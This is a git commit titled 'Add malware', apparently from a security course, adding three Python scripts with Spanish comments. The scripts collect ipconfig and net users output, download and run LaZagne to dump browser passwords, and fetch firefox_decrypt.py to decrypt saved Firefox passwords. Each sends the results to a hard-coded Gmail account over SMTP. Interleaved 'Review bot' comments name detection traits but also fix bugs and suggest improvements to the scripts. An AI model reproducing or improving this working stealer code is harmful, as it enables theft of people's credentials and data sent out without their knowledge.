Add malware

Manuel Vergara 2024-01-31 20:29:22 +01:00
parent 352889e2ba
commit 213a859a7d
5 changed files with 1502 additions and 0 deletions


@ -0,0 +1,68 @@
#!/usr/bin/env python3
"""
Malware - Envío del resultado de comandos por correo
Algunas librerías necesitarán instalación si se ejecuta con python directamente.
"""
import dotenv
import os
import subprocess
import smtplib
from email.mime.text import MIMEText
def run_command(command):
"""
Ejecutor de comandos
"""
output_command = subprocess.check_output(command, shell=True)
return output_command.decode('cp850')
def send_email(subject, body, sender, recipients, password):
"""
Envia un email con el reporte configurado
"""
msg = MIMEText(body)
msg['Subject'] = subject
msg['From'] = sender
msg['To'] = ', '.join(recipients)
with smtplib.SMTP_SSL('smtp.gmail.com', 465) as smtp_server:
smtp_server.login(sender, password)
smtp_server.sendmail(sender, recipients, msg.as_string())
print(f"[i] Email sent Successfully!\n")
if __name__ == '__main__':
dotenv.load_dotenv()
app_passwd = os.getenv("APP_PASSWD")
ipconfig_output = run_command("ipconfig")
# Primer correo
send_email(
"ipconfig INFO",
ipconfig_output,
"keyloggerseginf@gmail.com",
["keyloggerseginf@gmail.com"],
app_passwd
)
users_info = run_command("net users")
# Segundo correo
send_email(
"users INFO",
users_info,
"keyloggerseginf@gmail.com",
["keyloggerseginf@gmail.com"],
app_passwd
)
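Review bot: The Gmail app password is the only secret in this file and it is read from a `.env` via `dotenv.load_dotenv()` and `os.getenv("APP_PASSWD")`, while the mailbox `keyloggerseginf@gmail.com` is hard-coded three times as both sender and recipient; whoever obtains the script together with that `.env` also obtains everything previously delivered to the mailbox, so the sample should be stored without the `.env` and that account's app password rotated. `run_command` calls `check_output(command, shell=True)` without handling `CalledProcessError`, unlike the copy of the same helper in the third file of this commit, and `print(f"[i] Email sent Successfully!\n")` is an f-string with no placeholders. For anyone using this as a detection exercise, the stable traits are the `ipconfig` and `net users` invocations decoded as `cp850` and the `SMTP_SSL` session to `smtp.gmail.com:465`; a module docstring line such as `Sends ipconfig and net users output to a fixed Gmail mailbox over SMTP_SSL; requires APP_PASSWD in .env` would state that explicitly instead of "Envío del resultado de comandos por correo".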


@ -0,0 +1,85 @@
#!/usr/bin/env python3
"""
Malware - LaZagne
LaZagne.exe https://github.com/AlessandroZ/LaZagne
Este virus no se puede ejecutar con el Windows Defender activado.
Si lo desactivamos, LaZagne recogerá las contraseñas de los navegadores y lo
enviará por correoç
Algunas librerías necesitarán instalación si se ejecuta con python directamente.
"""
import dotenv
import os
import requests
import subprocess
import smtplib
import tempfile
from email.mime.text import MIMEText
def run_command(command):
"""
Ejecutor de comandos
"""
output_command = subprocess.check_output(command, shell=True)
return output_command.decode('cp850')
def send_email(subject, body, sender, recipients, password):
"""
Envia un email con el reporte configurado
"""
msg = MIMEText(body)
msg['Subject'] = subject
msg['From'] = sender
msg['To'] = ', '.join(recipients)
with smtplib.SMTP_SSL('smtp.gmail.com', 465) as smtp_server:
smtp_server.login(sender, password)
smtp_server.sendmail(sender, recipients, msg.as_string())
print(f"[i] Email sent Successfully!\n")
def download_and_execute_lazagne():
r = requests.get("http://192.168.1.120/LaZagne.exe")
temp_file = tempfile.mkdtemp()
os.chdir(temp_file)
with open("LaZagne.exe", "wb") as f:
f.write(r.content)
lazagne_output = run_command("LaZagne.exe browsers")
os.remove("LaZagne.exe")
return lazagne_output
if __name__ == '__main__':
output = download_and_execute_lazagne()
dotenv.load_dotenv()
app_passwd = os.getenv("APP_PASSWD")
send_email(
"LaZagne Browser INFO",
output,
"keyloggerseginf@gmail.com",
["keyloggerseginf@gmail.com"],
app_passwd
)
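Review bot: `download_and_execute_lazagne` has no docstring and its body hides what a reader needs to know: the binary is fetched from `http://192.168.1.120/LaZagne.exe` over plain HTTP with no `raise_for_status()` and no integrity check, so whatever body the server returns (an error page included) is written to `LaZagne.exe` and handed to the shell; `os.chdir(temp_file)` changes the process working directory for the rest of the run; and only the `.exe` is removed, the `mkdtemp()` directory itself is left behind. A docstring such as `Fetches LaZagne.exe from the lab host over plain HTTP into a fresh temp dir (not removed), runs 'LaZagne.exe browsers' and returns its cp850-decoded output; the process stays chdir'd into that dir` would document this. The module docstring's own statement that the sample cannot run with Windows Defender enabled is the point a write-up of this as an educational sample should emphasise: default endpoint protection already blocks it, and the LAN fetch-write-execute-delete sequence plus the `SMTP_SSL` session to `smtp.gmail.com:465` are the observable traits for detection.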


@ -0,0 +1,129 @@
#!/usr/bin/env python3
# coding: cp850
"""
Malware - firefox_decrypt.py
Firefox Decrypt https://github.com/unode/firefox_decrypt
La construcción del ejecutables es con pyinstaller y se ejecuta así:
pyinstaller --oneline malware.py
Para que funcione el .exe se debe harcodear el password y no usar dotenv
"""
import dotenv
import os
import requests
import subprocess
import sys
import smtplib
import tempfile
from email.mime.text import MIMEText
def run_command(command):
"""
Ejecutor de comandos
"""
try:
output_command = subprocess.check_output(command, shell=True)
return output_command.decode('cp850').strip()
except Exception as e:
print(f"\n[!] Error al ejecutar el comando {command}.\nError: {e}")
return None
def send_email(subject, body, sender, recipients, password):
"""
Envia un email con el reporte de teclas presionadas
"""
msg = MIMEText(body)
msg['Subject'] = subject
msg['From'] = sender
msg['To'] = ', '.join(recipients)
with smtplib.SMTP_SSL('smtp.gmail.com', 465) as smtp_server:
smtp_server.login(sender, password)
smtp_server.sendmail(sender, recipients, msg.as_string())
print(f"[i] Email sent Successfully!\n")
def get_firefox_profiles(username):
path = f"C:\\Users\\{username}\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles"
try:
profiles = [profile for profile in os.listdir(
path) if "release" in profile]
return profiles[0] if profiles else None
except Exception as e:
print(f"\n[!] Error al obtener el profile de Firefox.\nError: {e}")
return None
def get_firefox_passwords(username, profiles):
r = requests.get("http://192.168.1.120/firefox_decrypt.py")
temp_dir = tempfile.mkdtemp()
os.chdir(temp_dir)
with open("firefox_decrypt.py", "wb") as f:
f.write(r.content)
command = f"python firefox_decrypt.py C:\\Users\\{username}\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\{profiles}"
passwords = run_command(command)
os.remove("firefox_decrypt.py")
return passwords
if __name__ == '__main__':
username_str = run_command("whoami")
username = username_str.split("\\")[1]
profiles = get_firefox_profiles(username)
if not username or not profiles:
sys.exit(
f"\n[!] No ha sido posible obtener el nombre de usuario o el profile válido de firefox")
passwords = get_firefox_passwords(username, profiles)
if passwords:
dotenv.load_dotenv()
app_passwd = os.getenv("APP_PASSWD")
send_email(
"Decrypted Firefox Passwords INFO",
passwords,
"keyloggerseginf@gmail.com",
["keyloggerseginf@gmail.com"],
app_passwd
)
else:
print(f"[!] No se han encontrado contraseñas")
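Review bot: The module docstring gives `pyinstaller --oneline malware.py`, but PyInstaller's single-binary flag is `--onefile`, and the following line tells the reader to hard-code the password instead of using dotenv for the built `.exe`; embedding the Gmail app password in a distributed binary makes it recoverable by anyone who inspects the file, so the docstring should read `--onefile` and state that the credential becomes extractable from the binary rather than presenting it as the normal build step. In `__main__`, `username_str.split("\\")[1]` executes before the `if not username or not profiles` guard, so when `run_command("whoami")` returns `None` from its `except` path the script fails on the `split` and never reaches the `sys.exit` message; as written the guard cannot protect `username`. `get_firefox_profiles` and `get_firefox_passwords` have no docstrings; the latter fetches `firefox_decrypt.py` over plain HTTP with no integrity check, builds the profile path by f-string from `username` and `profiles`, and, like the LaZagne file in this commit, leaves the `mkdtemp()` directory behind and the process working directory changed. The `send_email` docstring here says "reporte de teclas presionadas" although nothing in this file records keystrokes; it was evidently copied from another sample and should describe the Firefox password report this file actually sends.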
